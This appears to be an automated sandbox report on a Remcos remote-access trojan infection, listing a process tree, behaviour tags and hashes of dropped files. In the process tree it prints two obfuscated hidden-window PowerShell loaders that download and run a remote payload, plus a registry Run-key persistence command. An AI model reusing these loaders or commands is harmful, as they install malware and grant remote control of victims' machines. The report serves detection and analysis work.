"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Trination.For && echo $"
8⤵
PID:3056

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
8⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1860

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hjrecentrere" /t REG_EXPAND_SZ /d "%Ibsenism% -w 1 $Fdrenegaarde=(Get-ItemProperty -Path 'HKCU:\Latherability\').Perdit;%Ibsenism% ($Fdrenegaarde)"
9⤵
PID:2184

C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hjrecentrere" /t REG_EXPAND_SZ /d "%Ibsenism% -w 1 $Fdrenegaarde=(Get-ItemProperty -Path 'HKCU:\Latherability\').Perdit;%Ibsenism% ($Fdrenegaarde)"
10⤵
- Adds Run key to start application
- Modifies registry key
PID:1456

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\krwumt.cmd" "
9⤵
PID:5640

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "$Panlogistical = 1;$Vrow='Su';$Vrow+='bstrin';$Vrow+='g';Function Underworkmen($orthophoria){$Scrubby=$orthophoria.Length-$Panlogistical;For($Sinecurism=5;$Sinecurism -lt $Scrubby;$Sinecurism+=6){$Inframontane+=$orthophoria.$Vrow.Invoke( $Sinecurism, $Panlogistical);}$Inframontane;}function Sodakagerne($Trichotomic){. ($Randir168) ($Trichotomic);}$Monogrammer=Underworkmen 'SonjaMAlufooJ rntzLre oiomstnlOve,sl fugtaS bpa/,jour5B reg.repun0 Wa e ponta(SprinWC,imii SuppnViceadBehanoTorpewDiskus tvan B,lcNImpedTBrygg Tegne1 Giga0Te er.Suba 0 poet; Swi, Bag,tWSub.riServinC mme6Speck4Isopy;Uncry SaxkuxH.irb6 ende4 Fa,e;Eksam fhngrCham,v Quan:Eucho1Hjert2Vorea1Ekskl.Impre0 Opta) ,ovn SskenG ntole udstc Bla kDoereoArcha/ Eli.2V lka0Reed.1 Cata0Tass.0 For,1Unwas0,edin1Paleo IglenF CouriCottir An,de .atif NumdoPerduxHidsi/ Immo1 C ar2Spids1Udkke.Anagr0c lvi ';$Stjernebilledets=Underworkmen ' PainU reetsForsie.eceprKerne- BegrALothogAabeneAdre nPeduntSpred ';$Propagandism=Underworkmen 'Plk.ehSheeptun,eltCo,plpNomadslogbo: f ar/Kompo/ etivsLikvi2 Mi,er.iske. sheetAfridnFo fn/AftvtcNgenbg infiiImpet/BesviCExocyoOmf ymArdorpKra,tlHeptaeAbrocmAndraeAfvrgnBongstEx.tiiStartnSv,rmgSnoha.Domspd HalowSabelpAntip ';$Lechayim=Underworkmen 'Bogre>Epico ';$Randir168=Underworkmen ' TraniPh,lae,lowbxRadil ';$lipomata='Nonconfined';Sodakagerne (Underworkmen 'Coat,SPlad.e Carat D,sc- SmreCPhon o El,mnGyna tDecume.etain C sttUpba Inter-.orvaPVerdeaGermitUnlo.h B od Y ukiTUd,en:Ochn \ InseCTrommaSprgerStormnLaug,aSkreolacidoiKoncezPresheSmi tsPan,e1Gapew4Pu.py0Wrast.Teva.t Betox Ul.tt Blac Progr-Th roV Raa,aEnwrilGr,fouCycloeS.gtl Disc$MoonslLotusiMed ipDemesoHeelemSam eaAendrt Tr na Demo;Terri ');Sodakagerne (Underworkmen 'AmeliiCalc,fVildl Div (GynectHempie Farvs Obset Diff-Jeglapdipsaa Me.lt Zionh.tamp FlnsaT.dmat:Unnau\EmittC UnafaDacrorForsanNonf.a,lakklPlatiiRootlzUptu.eToksisBlu.t1Em.gr4Impor0Plani.SubchtSo,taxDu,twtAnasp)Under{till.e Fi kxRemoriKo,sttDecim} tak;Redet ');$vredes = Underworkmen 'Co,oneTheodc U,hnhOpto oIsmal Tinta%Klavea Astap omplpSmsyndWh.elatetr tObsera Re.h%Lsnin\BjffeOTintncSkohocTeetauRaastlHerlit andrn PoteeGela.s Temps E.ko.Op,rnAUptrueAlbani Nege Dubla&Nar o&Sch.l TvilleOol.ncMac.ohPaillo Ti a Grou.$Ephyd ';Sodakagerne (Underworkmen 'Kvk,r$ Prolg p eclC umaoSgelnbForsgaEn lelHibba:,enacUSudernca.amsFjortkChar.aEkoipiAshratDistihEuphoeSkistd Pre,=Moll (CharacDigi,mUncapdMicro Kons / Auxoc Fold aftr$,eralvMfdd,rBook.ePsykid Resiefred.sFngs.)Dra s ');Sodakagerne (Underworkmen 'Stemp$Chilig Tra,lQuineoMe.olbSta iasemi.lOvers:Eu.atGRa.anyForemrUnmenoOarles IndftUgestaJvnfrtPlastiAfbr,cSmalnaCrapplPret laquifyKelea=he,sy$ FortPStentr GoudohumfepChloraSeddegCarboaB,ldunLysstd AdspiTautosUdt.mmNe tr.sekulsMa,ufpUdra.lApplai BefrtBr gs( vert$ YnglL itakeB,babcA,iathFusioaAst.oy,loriiTric mTrykf)Indla ');$Propagandism=$Gyrostatically[0];Sodakagerne (Underworkmen 'Fra e$UndergHensylFlakkoMokkabPolyta .illl Pyro: CuprUCartod UndeuInteneFukssl ,ubpiMaalegLowbr= lgesNKarakeKageswMelle-perspOKorf,bFoo ljHalvle Kresc misctUdlyd HjemSTrag.yMellesYtreetAki.ee hjulmTyran.Rein.N lippeIndkitS,bco.ProleWDeclaeAppenbUda.nCUntaslSekuni NecreAvlsmnJourntJudic ');Sodakagerne (Underworkmen ' abb$ Pro UE.capdU eleuGoodweFd,ellBor.tiDisorgRubri.ElskoHlandseSkru,aMazopdHydroeF,rmrr AfresGlyox[ Re u$StdniS.ongrtFidusj tomoe FricrMincinAfmele villbkiseliAnalylBaylylF.agee E,erdTi,ske MasttVidensSpel,]Tungs=Errit$Ba.kaMSubtioLim,hnCoho osnevegHusger Peria horrmtndehmEarthe.inecrRough ');$nittendedelenes=Underworkmen 'On,olUIllusd R.inuInvigeT,anelDolusi .enngMascu.TagtaDA nikoNed.gwAntimnMislyl A.omoIndkoaAtt,idSkoleFUnderiRottelOpstte laca(Psend$ScaphP TobarFelicoKelpspCladua R.segiwounaKajaknBuddidGrimaiAustrs Ug.nm Prev,Worsh$raderS Gua tsladausulphnTutted FremeXen,asTu.stldubits trune Lys,)Bowld ';$nittendedelenes=$Unskaithed[1]+$nittendedelenes;$Stundeslse=$Unskaithed[0];Sodakagerne (Underworkmen ' Guid$FyrmegdagpllUforsoColisb.egleaPa aml Graf:WhoreLSamleo Dis,b.iwase somif Novei Dozen LevisImper=Inven(UegenTFibere OversSuffrtBl,dp-GaubsPRegraaJavahtLomm hIndtr Galax$Fl,neSHighjtF.lisuTi,ndnP,lypdAarefeConv.s ,etrl HovesOlympeSemi.)Super ');while (!$Lobefins) {Sodakagerne (Underworkmen 'Tab,e$Frisrg Konsl.aragoInsemb ,iffaSuperlAnden:ThermKNightu emullK,pietTermaufrakorCambis Renti PanddincoreBarlar vaabnSn cke Pos.=Dinas$SyngntSe,ilrRegiouSpyg,e Cory ') ;Sodakagerne $nittendedelenes;Sodakagerne (Underworkmen 'Hypo.SPoignt urodaSpidsr U,bitUrban-.lainS S relS.ulde EtabeDestap Unwa T.old4Allig ');Sodakagerne (Underworkmen 'Serig$Dr tygStormlDishtoGranubPass aRetorlJustl:UnfolLMotoro CommbBreeze Dok f epyli InspnTriamsKlass=.vidm( ProbTMetapeCoffes DevitM ngo-.opezP SandaKuttet BicehSubre Penn,$ SkidSSt ketFi opu SignnH,bitd ,kuteSke.wszonesl hesisObte e,hims) Circ ') ;Sodakagerne (Underworkmen 'Seamy$MisgagBaandlFi,troEpiphbBuskpa.iskulAttac:AjlefT Au.oaFa.lkbSpraweSub trCa.upnMetamaSammekAntollFi.eneFor itRebel=Milie$SeemlgKaturlFo.sao konkbBallwaRe.relEmigr:S,indP PrimrTrykie.chizbMic,oaFranks alkeiInketl Rstia dashrHjelm+Louve+Light% Sk b$ Mar.G IchnyBre,mrVejsko P rmsIne,st SvejaClient Unp,iTranscVandfaCyclolBiledlArbejyDampe.Sha kcAcrotoStignuVandbn Facat.augh ') ;$Propagandism=$Gyrostatically[$Tabernaklet];}$Bygningsinspektrer=300408;$Demimonk=28954;Sodakagerne (Underworkmen 'Ddsul$Vrd ggAlchel ReguoRenteb CholaEtalal Ca,i: edemFAudiol Tr.niNatakpOverfpAlkoheLabourNann,mSkattaAd,eks,ascokTrituiTyphinDevale RapsnMan,esReinf Prop=,rgem Un.onGPlkkee MasktCount- akkeCQu.dro AmatnLnpoltTenoneLau.dnForsutKnokk Hea.t$ ForsS Talkt.uberu Bunkn .kifdwiseneSind s W rklFl gtsPa are Se i ');Sodakagerne (Underworkmen 'Helsi$Dataeg.reezlOprmtoKuverbDarwiaEfterlSweet:K,ienp ErstrKontoeBra.gsrekurtPreini UndegNabakeC iaspProdurBrugeo K,nnjSporoe BengkPlat tTi.ta Ankef=Lo,nw Overc[FlockS.pticyDjvlesBlowstNiduleM,tatmtilli.Akt,eCChastoKommunBve svMowi.eNeurirTe,ratSyphi]Nonpe:Rejse:UnfelFDjv,lrTwin.oEuchrm nexpBSpiriastatesThanaeRmebr6Forva4MilieS G.rmtKinetr Fjoli Pol.nPotengDesti(Diffe$ObligFhoersl Gid,iKeybopNonhapFr.steMot.rrHy,romHomogaRet,isSmpi,kBredbiThailnSur,ueS,idsnGynurs Redb)Tider ');Sodakagerne (Underworkmen ',rogr$Anatog StollRensdo ,otabValgsaZes,il Ari,:ForurF DeleiUddybsMissikPjat.elunknhK ania abordBly.aeTh,rlr Numr Al ed=Gl.ss Bloms[unfulSEpiceyC apws VaritS,dfreFlskemVolar.UmyndTDynameUnplaxMet,rt Tarw.Pim.lESa.ienTyvercud.rkoovervdByplaiSkuddn,orangThete] lse,:Gamac:UngdoA sei,SdondiC FjanI striIAf,ek.N.nchGPaareeKollitGrainSF reftS,eskrPastei ReshnI strgEge,t( Sove$SimulpYde srB edee,allisFakk tCoilei Bortg Svmme.kaanppod vrSupraoPos ujHelsiebaronkStalktpland) .ril ');Sodakagerne (Underworkmen 'Opd.t$Porceg ,uttl PrisoOarerbVi cuaP.opolNonin:Mar hBInt,raKommurDest,nartize ProgpDillelNe asepseudjKlu,peSputur TremsCatapkNontreBetjerDumfo= Tobi$ComunFHel ai Tilfs BlinkRing.eTap,shbucceaLotifdSpecieNasalrRo,an.Grn,nsGrammuOvercbRensnsAka,etSvi urTilveimor inSans.gUdkom( Unc.$.ftmfBGeniaySjakfgLiseln recoirad,on.essegBuengsEpicoiN nconmo opsOversp GraneDobbekYetistS,lderUnq aeI.dsvrRepr.,Hjspn$ LumpD HoldeBotchm Co,eiSealkmL.vreoInd vn Pro,kSkrub)borgh ');Sodakagerne $Barneplejersker;"
10⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6540

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Occultness.Aei && echo $"
11⤵
PID:7060

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wdbdzt.cmd" "
9⤵
PID:1276

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "$Anlia171 = 1;$Bouvardias='Su';$Bouvardias+='bstrin';$Bouvardias+='g';Function Generative($Seminudity){$monkery=$Seminudity.Length-$Anlia171;For($Unrounds=5;$Unrounds -lt $monkery;$Unrounds+=6){$Blockmaker+=$Seminudity.$Bouvardias.Invoke( $Unrounds, $Anlia171);}$Blockmaker;}function Telefonforbindelsernes($kvantums){. ($Emblematicise) ($kvantums);}$Hoody=Generative 'OutquMVaebnoEllenzPra.siPollil allalRanzaaApart/Repla5 Bitt.Ski k0 K,nd Filka(AnnihWImpori AnomnUkenddBlyhooKontrwOverfs osch CigarNDriftT.reng .rgi1Stats0Aadri.Retr,0Curar;Tvrma OmhygW,rolliWryn.nArabi6Garve4 Thai;Orth. Talonx Aphi6.otal4S emm;Poste Fedtr L.mevTelef:Jumpy1 nfo2 ,iti1Hemic.Tegne0Sfrer) Id.n PseudGLiquoeDeificgushik Eskao,ugen/Spurm2Bssem0Staff1Indle0F.nkt0 .ulf1Pusle0Cran,1c dde HovedFPrintiDigesrKontueTheirfBes ioLatrix Jeri/,alco1Syn n2 yol,1Sacre.Kaplb0Femaa ';$kongetitels=Generative 'SkideULigelsF edne PermrKe.ne-UheldARedstgElem.eRestonOpvart luc ';$Decrepitness=Generative ' SquahNonhetHetert LagrpOptimsA ria: L,ri/ Caut/Li,strSelekaLessenIntoxcKitl hHjemmo DrifbOmtaloBabyssBiedecFangeaJrlior DokudRdkaaiProjenReabo.Compuc Art o Sp.imSk.kt.AvertbL,ptor Skrd/VirksdOphicc V,rd/biskoGKvoter ShaueJaniteNyerhn Gulvs irupagyth nFri,fdCop i.Bombao ntecPaganxVelfr ';$Sparging=Generative 'Afkod> Int, ';$Emblematicise=Generative 'DogcaiSperle Dyppx Akaz ';$Fish='Afstaliniserende';Telefonforbindelsernes (Generative '.anetS ublueBortctstrmk- .endCCysteo deenUnv.bt,ultue Br.sn Subst Au.o bista- MariPforaya NucltProprhchrom KontaTLigus: Auto\.ainsADrotseCyt.krAmbeeoJubarlThemsiandentSteaniCalcicSobbi.krerptLnkamxConf tUnbad Knska- StivV Za.ia Id llReturu Tra e Unde Forse$UdsprF Indii Aceds R sth u,ro;Unrec ');Telefonforbindelsernes (Generative 'Domi iSlvklfMyt,o Aftra(TerybtMaksie Skr,sTol.btGenne- A,prpTyveraSer.ltPatinhTrigl Loka,TScant:Mjdet\NibliANondeeRysler Parao,alaxlTeodiiasciit.dfrsi.oaorcpeber.Non atBenzixNonnetOpera)Il,eb{ Farae Ex exFiguriForsttHauss}Pa kv;Kvato ');$Drikkevareemballagen = Generative 'Ka,toeG.nfrcDvehjhReligoTurbo Mosqu% entraB,hndpMisawpHerredKaloraEppiet .ollaAfsla%Dandy\ RemeSSt,ckk ythii Sa,gn FrstbWir raiblanrStaillMaskli Clerg Hfebe pernrSaccoeEgebrsstatu1engan5Behov6bogho.Brunan FylkaPatrutanti, inte& Trv.&Tyks. TyraneAdynac egomh Dr.go cra logar$Splen ';Telefonforbindelsernes (Generative 'Stu m$SalvogSoci.lBenkro HotdbAccelaEthlylSuper:XihypTDobbeoBillepSnubbf entlGudsbiEmuleg yrevhSage tUpbol=Svin (Eftercfiffim PresdVival Krypt/gnathcDy de Onera$IdiomDBorndrOutc iSpaankIdolakIlfrdeObstavCalipaNonnerF,rreemrkvreKonsemRredeb.analaSlugtl Natilwhitta L gegFlyvreManchnKathu)Hyper ');Telefonforbindelsernes (Generative 'Vris.$Spi.egSub elResboo Learb Cod.aK.mpdlMecha:Va drVPalaeoOdou,l jerd,ambusgaves=Obsk,$Smre D,pokoeTogp.cSuperrK,rsue BrutpLsideiBal.ntRefranHrguleAlim sTweaksUnenc.B.roksVentrpInfielOnom,i MeditAnn,t( Haje$NeapoSBktnipGlaciaMinyarAlbumgUnwari elefn SassgMikae)Re.ud ');$Decrepitness=$Volds[0];Telefonforbindelsernes (Generative 'Ener.$Vatu,gTitanlD,rmaospaadbSche aSjovelLeadw: TrutSGennet,nuckuSygdodHa.mliStudie Kobblultrae Hjesg P,laaRubbetGaulseH.arsrSpea.sCo te= JudoNVulneeIrl.nwUnip -RetriO SamfbHjspnjAmphie Comac S,mftOut o ChlorS lbniyreavesledtstSkrifeTourtmGrupp. ByggN imeneBetnktAxoid.sync.WDyreae BlaabFabriCNatiolFungoiTeleoeDessenHovedtAccep ');Telefonforbindelsernes (Generative 'Frafa$ alliS SabrtKrydsuUnweldAutomiMicroeAktivlAppaleCentrg isosaTal,ctKonste ResyrMuckssUn.er.FilmeHGoatpeVes.iaK,lded H,deemde arForess Skak[Tredv$ VurdkSinkbo.rdoknDolerg DvrgeNonsatTarmeiGenestAfpareunhollsinlis Iden] T.ot= lact$AtreiH Tse,o udtmoUntrudLimpayEmbro ');$Acidology=Generative 'E spoSSprogtTribauUratod Fwdbi harteChemol Ambie Rekogtamera Implt Chece,ndarrKaldssFor,a.circuDComatoVandewFlippnTar el samfo AakaaHeterdsklerFVoyagibuffelConcee Ador(Has n$L.retD.ingsePhilocToa,rrOv.rseVi,ksp SilkiLanthtVok,vnCas ieD.matsAryb,sTraj.,W,eyl$ProteSTurc t Foraa MundmBoldekProtoa Grenf Mellf DepeuSh.veeStillnCondi)Drivh ';$Acidology=$Topflight[1]+$Acidology;$Stamkaffuen=$Topflight[0];Telefonforbindelsernes (Generative 'Minia$ Roseg OpsilFornjoSagsbb KodeabondslExote:SantoICh onr KonfoKaritnInkaswSkrueoBeskyrSparktnonex=Vi,ev(KatodTMarskeStriksIncartHafga-Ska eP Un raBombat RomahHa,sl Servi$BlufrS.aroltSangsaS,ewhm arigkUntwiaHentyf ItonfExostuLign e Fregn Frem) Kool ');while (!$Ironwort) {Telefonforbindelsernes (Generative 'Inte,$.alavgSwainl,tartoFar.obAntita,lowflSuber:Ner,eK S.enlAfblaiAksi,tHjmaroMede,rEndnoicrochsFormusIncomeL.vtrr imponTeleseDiske=Ls ng$SkrmstpietrrCheapuRundfeSte.e ') ;Telefonforbindelsernes $Acidology;Telefonforbindelsernes (Generative 'aflevSStandtAstriaKorserTanketBookk-NonreSRaa sl UdbreJoiniePremapTek,t Fraud4Vo at ');Telefonforbindelsernes (Generative 'Hyste$UndergBirthlV,jrpoT hvebSpndiaSemial A gu:TosepI .sserSmughoWhitenFyrigw Ponco Beaar reagtS.ott=Kugle( DyssTSclere ,bdosOverptLnr,g- AritPGaffeaDipthtUninhhImpli Civi$KogenSHaandtDess aExtermRutsjk A,kua SuwefVintefOe.onu SidseFolkenSaddl)In il ') ;Telefonforbindelsernes (Generative 'Talen$Bankvg Ted.lObl goBilggb StilaSprinlFjset:SaxofEApollmForynaMo.uln Limaaom ivtFladbiO ersoOlva,nReagee ,onsnCarri2S raw3Tropi9 Down=.irel$gobblgDampnlrepinoFilicb.indea NgstlOphed:I.terBRacemrBaskeaTomesmProjefLegpirriotii gurgt Blin+,eton+Resig%papay$TrsteVEkspao JasplRefo.dunbolsMarke..oneycEkspro FusluSanktn Morat Uige ') ;$Decrepitness=$Volds[$Emanationen239];}$Tantawy=293146;$reconsolidated=28794;Telefonforbindelsernes (Generative ' L qu$OptimgstramlPrjseo SardbGyro,aMrtlelHensi:Re,owB Alt lComp,apa ankBrokakundereArrakrCry nnDannee drivsRocke Annun= em.t UdtvrGTjrene,pokrtChrys- Sk.fC CorpoC.acknAbject Chaue usinn.impetUnerr Jacks$DioscS InditSnowbaMagnemCom ek.ompra Brodf OpvufRek,iuHypnoeAuladn.egej ');Telefonforbindelsernes (Generative 'Jour $nonphgSa,tulVandroGr,jeb MetoaKn cklExoph:SmackE BekeuStr,nkK blea.agnelKnas,yLarvap KosatDismaurit.rsmaoisscep aeKodifnMise Ha s= Utrt mi ju[VoldtSEva,uy nwas K,ustParite slagmMadse.Dith,CBulkhoHowesnFringvClonaeCh onr,ennitRoedm]Anom :Nat.e: S.ltF Seddr .pono UdsymOcci,BAn.ipa Modis,dspeeFrans6Foroe4StagvSAliamtFebrirS.ramiB.sionSlemmgm,rro(Reass$Pri,aBFld.nlNonfra.ggshkFromlk,nsufe PingrRemmen illeetoskisVidim) Gala ');Telefonforbindelsernes (Generative 'forka$Kor.sg,roholDiskooSouplbPillaaSmaasl peri:BerusK TalseSpoormKalveiFilmakUrokka eetlBra.mi Euphe,atioiAril.nQ artd UndvuEttlisTosprtHan erR fraiCh sss Ku o inn m=Elect Udstr[ HjfrSSpinly.nomosCounttMethyeSvam mConcr.HawaiT HedgeU,ochxCoexitFor.r.UnderE Gantnu.paycBiogros,anddTimidiUred,nG bangSemis]Bemal: Hand:Sh ppA NounS,entaCAffugITekstIJordv.KaryoG bra,e SkoltHexa,SBer tt TrufrSo.siiOverdn vigugBikse(Su,ve$AnnelESc,oou Tensk ineaaFarr lThougy ReagpSwitct InfouSknsasSynagsProgre.edton Pe c) Af,r ');Telefonforbindelsernes (Generative 'Litho$ BombgPomerlF rvnoBetjebexpliaF,ipolSequa: PermOwittipSmigvhuimo aIn.usvLnudvsVari rU cogeLobbitMetalschromb Exene AarsswantakTidsfyLocultDextrtP boieUgunsdPaleoegudsf=Destr$Gla oKFlleseMinermBiss.iIntrakHomoiaHimmelSnrini MjsoeResp.iChamanSplend S euu P.eusCircutHolt,rTil riWestss auss.Blueps ,ynauUngd,bStrymsFarvntTale r Te,ni TcawnVad fg Str,(Afg.f$An itTSeko,a,nexpnDisartUfremaSimulw Refuylevne,Afsen$ MassrPteroe RadicUrerso BothnK,mmesBiorhofarmslG.mnaiFor ad,tkama GeartTubefeUnderdGoatl)Basis ');Telefonforbindelsernes $Ophavsretsbeskyttede;"
10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:7124

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Skinbarligeres156.nat && echo $"
11⤵
PID:516

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
11⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:3436

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
12⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6828 -s 332
13⤵
- Program crash
PID:6860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3436 -s 356
12⤵
- Program crash
PID:2676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 176 -p 6828 -ip 6828
1⤵
PID:7104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3436 -ip 3436
1⤵
PID:6728

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat
Filesize
126B

MD5
031456ddf0293370fd257061e6d14849

SHA1
1d74c167f046a6abfb8445672de72701c84d8a69

SHA256
380e86606fe165760fe6ee986b26e67408858b5eaacdaed004ff9b1ae6b16c4b

SHA512
824e0fade38486d090b84df855469046dca4d3384754910a1895f88cdb87fc1409518c3e08e87288ec27e8a73f5d11ef32c7818f8632f0bc90ef95b55598854a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\0322BBB662C23FFC259D34E048AF7856
Filesize
503B

MD5
2957ea7549cf65fd9cd51eeb08ace484

SHA1
0d41e0a21c3996587a7f3640ae22ef65318e893e

SHA256
62f69c28bb4a3b56aa62e6b044aedeb4d0707142a5391c2239eb3e2754d40a91

SHA512
51e63c88c39f7635daff55b8b2a24ebeab12757bbfa0d76ed4551bc14976a5d56e45ed846092d92972ec83a26ab7638c36543bbc29b25fde7fe2c9c95acf4db0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
Filesize
717B

MD5
822467b728b7a66b081c91795373789a

SHA1
d8f2f02e1eef62485a9feffd59ce837511749865

SHA256
af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

SHA512
bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4B33FB012A2D26607E54B30B4788C864
Filesize
503B

MD5
4415c3f74418ce1d12c078f8636156eb

SHA1
a4b0ddfcd88679d9204e90c28f1c29ffcbc6e82f

SHA256
43c033bd56ddeb443645c3f2bd6e41e866a2f51ebd3dde2f541efc234199cf43

SHA512
f79606fdb750a84231c6442e9b7d306a43ed15752e03696c5aea369fed2432c68604e4e69e2654148430ddaa43283d35e3b097aeffe39a8fd310ea92fe64755c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\0322BBB662C23FFC259D34E048AF7856
Filesize
548B

MD5
4225ed1d2e15542e3bd1a2684cf3db28

SHA1
28ec4a219401806cdbe5c1fc9f2b9f8aef9c339c

SHA256
6754a9a31677566b286197054336bb228367862ce9d2ac87f32a97496ca5b89f

SHA512
2e7e6939753d1133bc5af6c92c7a19a62738f4095d1344cffa872088c76866dc999712ec1fe87e745572ebfe19856b3f88d0f2fefd70e930c87ecf4b8d587f14

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
Filesize
192B

MD5
d675015311b0bdca6ea96d6778206da0

SHA1
0aa52952cc9ff2ec73ab9023e4ca2a2672e0bfd8

SHA256
f33416cd6727dad624cf212e3030019d6115015b85f2eadda0ac211ca3eafa44

SHA512
a92ee11f13dc46160f665c4fca15c1512201c09b63b6e20a452d66a79439eecca4c5b80a765a62d5c289310039170a376bb92f29d3e9a4592195b080040df86a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4B33FB012A2D26607E54B30B4788C864
Filesize
548B

MD5
0d51f83083e0c76a8d421c91619d983c

SHA1
f42fbe1ccdd3869463ace142cb409d0b7b927018

SHA256
c4d347830cfab2d6423bdd80961ee2c0546c359ccbf066d4a461f95badba181c

SHA512
7ad076d6b5a646b2c54ed1ebdd1c7f94a5a133778babd57568e89fb0f7ea8c358fc5fd28b2f6e136381c0fba04588101bce7b16df3e396bafffac92b04b6a516

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
25604a2821749d30ca35877a7669dff9

SHA1
49c624275363c7b6768452db6868f8100aa967be

SHA256
7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476

SHA512
206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
53KB

MD5
d4d8cef58818612769a698c291ca3b37

SHA1
54e0a6e0c08723157829cea009ec4fe30bea5c50

SHA256
98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

SHA512
f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
20KB

MD5
9aa40027455afa568c148a99fb5d49ae

SHA1
0328bec0437136816aea59d0bbe50840279c6f47

SHA256
4ea77010ef4db764dc108b04a2117e8b119e2b76c61658dd1b3f43e3d86204d9

SHA512
855328d0727cb39525339424485b5015f8b473c92ad878afc4a186e20d73179684f736842171edfbe3658085cb2f1293f03add9cb028927d18645d17f2986b2f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
20KB

MD5
14363f58788bb2cc7f1096512ff7c04e

SHA1
54ab5d6aff69ec357dae9eda279ff179c2cde3a0

SHA256
b678bc1be9bb78046383fabf2a7eefb5945247d361d767d00fb2b4ca1316ed91

SHA512
846afc0a816dce93ab989439439e066a69390cfc80cbf7bfc0ce08f95484f09d3eebf4181178a0051af192e68da0c50e1983efe2c40522be83883fc751df712c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
20KB

MD5
103127f090439f449aa57fbe0fcc2380

SHA1
0dbf5b3832328dfd44d8ac4cae83893859198241

SHA256
d4b114f47ca0ca28946c06ace3800a15414694a403de6543bd9fa623c8ea9606

SHA512
b9a2ae76ce8b134db313a70341e9e97f543915932ddf4b9c5b291f7cb2b68ebcfd71b0eb6e87605aa5a052dab4a88d4d52728905e3cfa2a4c1c676b1e9016ba1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
7224298af316ab030a6ea7b29e69915d

SHA1
c73b3f8af0647472461d4746f9edf2153b754bd0

SHA256
c869d981719dc133b2e2dba5cfc9925ce9b327dbf079a18b8b6caa77716e1f87

SHA512
5ae6512f693439759dfc913af7db37395fba2216c1b87bf5b6788a39f01a7c22f6daac0c2ccb680c552d431ed5806a344358a2e1856045a2efad43f0059ad099

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uepml20u.dc3.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
